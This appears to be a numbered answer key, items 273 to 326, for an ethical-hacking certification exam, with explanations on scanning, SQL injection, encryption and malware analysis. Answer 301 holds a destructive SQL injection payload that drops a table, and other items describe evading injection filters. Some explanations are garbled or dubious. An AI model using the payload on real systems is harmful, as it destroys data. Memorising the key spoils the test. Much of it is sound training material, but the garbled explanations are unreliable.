Leverage string concatenation to break identifiable keywords, as this technique alters the structure of SQL statements in a way that can evade signature-based detection systems while still executing the intended malicious query.

Answer 273

Investigate for anomalies in file movements or unauthorized data access attempts within your database system, as APTs often involve stealthy data breaches and unusual internal activities, making such investigations critical for confirming and isolating these threats.

Answer 274

Deploying a Cloud Access Security Broker (CASB) provides comprehensive monitoring of cloud resources, real-time threat detection, and ensures consistent enforcement of security policies across all cloud workloads.

Answer 275

eMailTrackerPro is designed to track the source and travel path of an email, including time spent reading the email, geolocation, and device type, but not to identify or list all email accounts associated with a domain.

Answer 276

Store the potentially malicious program on an external medium, such as a CD-ROM, before analysis on the sheep dip computer, to avoid direct transfer to the isolated system and to maintain the security of the production environment.

Answer 277

An organization is at fault if it does not fix all identified vulnerabilities, reflecting a gap in their approach to cybersecurity by prioritizing limited resources over addressing all known risks.

Answer 278

If the Wi-Fi password is too complex and long it is difficult to crack as complex and lengthy passwords significantly increase the time and computational power required for successful brute-force attacks.

Answer 279

Encrypting the data client-side before uploading to the SaaS environment and managing encryption keys independently ensures the data remains private and inaccessible to the cloud service provider or any unauthorized entities.

Answer 280

Sending a FIN or RST packet to close the connection after it is successfully opened is essential to properly terminate the established connection to maintain ethical hacking practices and avoid unnecessary resource utilization on the target host.

Answer 281

WPA2-PSK with AES encryption provides a significantly more secure and modern encryption method compared to WEP, greatly enhancing the security of the company's wireless network.

Answer 282

z=600, u=2: The attacker devises 2 SQL payloads, each aimed at tables holding 600 records, affecting all columns across all tables, resulting in the highest data volume extracted as per the formula 'E=xyz*u'.

Answer 283

dnsrecon -t std performs a standard enumeration (std) of the specified IP range, which includes reverse DNS lookups, nameserver, and MX record queries, providing comprehensive information about the domain.

Answer 284

Use UDP Traceroute in the Linux operating system as it allows tracing the packet's path without relying on ICMP, which may be blocked by the target's firewall.

Answer 285

A TCP SYN Ping Scan can bypass strict TCP filtering rules by sending SYN packets and analyzing responses, which helps in discovering live hosts even with robust firewall settings.

Answer 286

Verify the sender's identity before opening any files in Instant Messenger Applications can prevent a malicious file from being opened and executed.

Answer 287

Implementing IPsec in addition to SSL/TLS provides data integrity checks and ensures the data has not been tampered with during transmission.

Answer 288

An inference-based assessment solution simulates an attacker's perspective, uses automated scans with updated databases, and is adaptable for multiple networks, aligning well with large organization's requirements.

Answer 289

User-directed spidering with tools like Burp Suite and WebScarab allow manual control over web crawling, enabling the ethical hacker to uncover and explore website elements that standard automated web spiders cannot access due to specific restrictions.

Answer 290

Establishing a Defense-in-Depth strategy incorporating multiple layers of security measures increases the complexity and decreases the likelihood of a successful attack and provides a comprehensive and layered defense against various types of vulnerabilities and threats.

Answer 291

Regularly scanning systems for any new files and examining them helps in early detection and removal of suspicious files and attachments, effectively reducing the risk of malware installation from email sources.

Answer 292

Always suppress detailed error messages, as they can expose sensitive information about the server's internal workings, making it vulnerable to exploitation by attackers.

Answer 293

Maimon Scan is very similar to NULL, FIN, and Xmas scans, but uses FIN/ACK, making it less likely to be detected by network security devices that are set to identify and flag more common scan types like SYN scans.

Answer 294

Test 1: A TCP packet with the SYN and ECN-Echo flags enabled is sent to an open TCP port.

Answer 295

h=1987 (prime): The attacker's packet rate exceeds the server's Capacity, causing potential unresponsiveness, as the server's ability to handle packets (h) is lower than the rate at which the attacker sends packets (r), leading to a risk of server failure.

Answer 296

Using the IDLE/IPID header scan technique with the command "-sI" allows the attacker to perform a stealthy scan without revealing its IP address.

Answer 297

p=175, q=250: The key size 'n' is adjusted by increasing both ‚Äòp' and 'q', thereby increasing the complexity of the attacker's decryption process, as a larger 'n' means a higher computational effort required for decryption using Shor's algorithm on a quantum computer.

Answer 298

The ports on the target network are open if there is an increase in the IPID number by 2 after an IDLE scan.

Answer 299

The next logical step in the Cyber Kill Chain Methodology following the "Delivery" stage, where the attacker uses the delivered payload to compromise the system would be to exploit the malicious payload delivered to the target organization and establish a foothold.

Answer 300

Connecting the system to the production network he malware analysis should be avoided, as it risks spreading the malware and potentially compromises the security of the production environment.

Answer 301

‚ÄòOR 'a'='a; DROP TABLE members; --: This payload combines the manipulation of the WHERE clause with a destructive action, causing data loss, which is significantly impactful as it can lead to permanent deletion of critical data from the database.

Answer 302

snmp-check gathers a wide array of information about the target, as this tool is specifically designed for SNMP enumeration and can extract detailed network information without modifying any parameters in the SNMP agent's MIB.

Answer 303

Passive Footprinting first, followed by Active Footprinting, minimizes chances of detection during initial information gathering, providing an initial layer of information before engaging in more intrusive techniques that could alert the target.

Answer 304

Metamorphic and Rootkit malware embeds itself within system files to avoid detection (a characteristic of rootkits) and changes its code to evade signature-based detection, which is a feature of metamorphic malware.

Answer 305

Qualys Vulnerability Management, as it offers comprehensive coverage and visibility across both on-premise and cloud environments, continous scanning capabilities, and real-time monitoring for changes, making it ideal for hybrid IT infrastructures.

Answer 306

Ensuring atomicity of operations between checking and using data resources, as this approach directly addresses TOC/TOU errors by making sure that the state of a resource does not change between the moment it is checked and the moment it is used, preventing race conditions.

Answer 307

RST hijacking is a technique of injecting a spoofed reset packet to terminate a legitimate connection aligns with the methodology of RST hijacking, where the attacker sends a reset command to one or both parties in an active connection.

Answer 308

By deploying network intrusion detection systems (IDS) across an loT network, an IDS can monitor the network for suspicious activity, including the early signs of a DDoS attack, and take preventative actions to mitigate the attack before it impacts critical services.

Answer 309

Probing the IPC share by attempting to brute force admin credentials directly targets the IPC share to enumerate possible points of access or vulnerabilities, which is essential for gathering detailed information about network shares and services.

Answer 310

Insider attacks involve a high degree of understanding of the organization's internal processes and systems, they can be prevented by implementing robust access control and monitoring.

Answer 311

Synthetic Identity Theft involves creating a new identity using a combination of real and fabricated information, which the attacker then uses to open bank accounts and receive benefits, making it distinct from other types of identity theft.

Answer 312

A SYN scan stealthily identifies open ports without fully establishing a connection, as sending an RST packet after receiving a SYN/ACK prevents the completion of the three-way handshake, making the scan less detectable.

Answer 313

location: This operator finds information for a specific location, making it the least useful for extracting sensitive VPN-related information, as VPN configurations and details are unlikely to be tied to specific geographic locations in searchable content.

Answer 314

Encrypting all sensitive data stored on a device ensure that even if the device is compromise, sensitive information such as credit card details and personal identification numbers (PINs) remains protected and inaccessible to unauthorized users.

Answer 315

Base metric represents the inherent qualities of a vulnerability, as it measures the fundamental characteristics that are constant over time and across user environments, providing a foundation for the overall CVSS score.

Answer 316

nbtstat is traditionally used with |IPv4, if the company's network is using IPv6, an enumeration tool compatible with IPv6 is required for effective NetBIOS enumeration.

Answer 317

Checking for hardware and software misconfigurations to identify any possible loopholes is very important, even with up-to-date systems and trained employees, as misconfigurations can remain a significant source of vulnerabilities in a secure setup.

Answer 318

Thin Whois model only provides limited information about the domain, such as the registrar and name servers, requiring further queries to other servers for complete details, which may appear as incomplete data retrieval.

Answer 319

A hacker may attempt to bypass the special character filter by encoding his malicious input, which could potentially enable him to successfully inject damaging SQL queries, as encoding can help evade filters that are designed to block known attack patterns and special characters.

Answer 320

An AES key size of 256 bits provides a high level of security, which is crucial against a quantum algorithm threat, while maintaining a reasonable balance with performance, as RSA key generation time is primarily influenced by the RSA key size rather than the AES key size.

Answer 321

Enforcing a policy that only allows app installations from approved corporate app stores directly addresses the risk of malicious app installations by ensuring that only vetted and secure apps can be installed on company-provided devices.

Answer 322

When executing ntptrace -n -m 5 [servername/IP_address], the '-n' option avoids DNS resolution for faster results, and '-m 5' limits the maximum number of NTP servers in the trace, making it efficient to understand the NTP hierarchy and server connections.

Answer 323

In pretexting, fraudsters may impersonate executives from financial institutions, telephone companies, and other businesses, potentially leading to a network vulnerability of gaining access to proprietary project details

Answer 324

Exploit the NetBIOS Session Service on TCP port 139 to gain unauthorized access to the file system, which can be exploited to gain information about an enterprise's internal network.

Answer 325

After discovering a keylogger, the team should employ intrusion detection systems and regularly update the system software, as these measures can help detect unauthorized programs and vulnerabilities that keyloggers exploit to gain access.

Answer 326

Applying the Diffie-Hellman protocol to exchange the symmetric key allows two parties to securely exchange a symmetric key over an insecure channel, which can then be used to encrypt and decrypt sensitive data.